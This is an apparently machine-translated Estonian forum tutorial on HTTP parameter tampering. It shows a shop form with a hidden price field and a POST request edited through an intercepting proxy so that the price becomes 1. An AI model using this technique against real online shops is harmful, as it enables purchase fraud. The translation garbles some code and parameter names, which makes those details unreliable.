See artikkel on masintõlke peegelartikkel, palun klõpsake siia, et hüpata algse artikli juurde.

Architect_Programmer_Code Põllumajandusvõrgustik»Arhitekt Muud tehnoloogiad Turvaline rünnak ja kaitse Intrusiooni tungimine: HTTP päiste rakendamine
Vaade: 12586|Vastuse: 0

[Ohutusõpetus] Intrusiooni tungimine: HTTP päiste rakendamine

[Kopeeri link]
Postitatud 07.02.2015 17:59:07 | | |

HTTP päiste rakendamise kohta

http-päist kasutatakse sageli veebilehtede edastusmehhanismis, kuid enamik Hiina algajaid pole seda artiklit märganud; see artikkel on pühendatud ainult algajatele, http-päise rollile sissetungimisprotsessis.

Võtame näiteks ostulehe, et analüüsida väikest osa HTTP päiste rollist.

Esmalt analüüsime ostulehel olevat vormi.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<sisendi tüüp="peidetud" nimi="hind" väärtus="449">

<input type="submit" value="Osta">

</form>

Avamisprotsessi ajal tee ekraanipilt tema http sõnumipäisest ja vaata seda

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Kuigi ostulehe avamisel lehel hinnaväli ei kuvata, saab kasutaja seda siiski muuta ja hallata.

Montaaži saavutamiseks on kaks võimalust

1. Salvesta HTML lähtekood muutmiseks ja seejärel lae see brauserisse uuesti käivitamiseks

2. Kasuta proxy pealtkuulamist HTTP päiste muutmiseks (proxy ehitus tööriista purskumises)

Võtame näiteks ülaltoodud HTTP päise
Enne muutust
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Pärast muutust
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kogus=1&hind=1


Viimases reas on välja hind väärtus 2400 ja kui muudame selle 1-ks, saame iPhone 4S-i odavamalt.

See artikkel annab vaid aimu ootamatutest edusammudest, nagu LDAP süstimine.




Eelmine:MySQL unustas parooli taastamise parooli rakendamise meetodi
Järgmine:SQL-süstimine täieliku veebisaidi tee saamiseks

Seotud postitused
Disclaimer:
Kõik Code Farmer Networki poolt avaldatud tarkvara, programmeerimismaterjalid või artiklid on mõeldud ainult õppimiseks ja uurimistööks; Ülaltoodud sisu ei tohi kasutada ärilistel ega ebaseaduslikel eesmärkidel, vastasel juhul kannavad kasutajad kõik tagajärjed. Selle saidi info pärineb internetist ning autoriõiguste vaidlused ei ole selle saidiga seotud. Ülaltoodud sisu tuleb oma arvutist täielikult kustutada 24 tunni jooksul pärast allalaadimist. Kui sulle programm meeldib, palun toeta originaaltarkvara, osta registreerimist ja saa paremaid ehtsaid teenuseid. Kui esineb rikkumist, palun võtke meiega ühendust e-posti teel.
Mail To:help@itsvse.com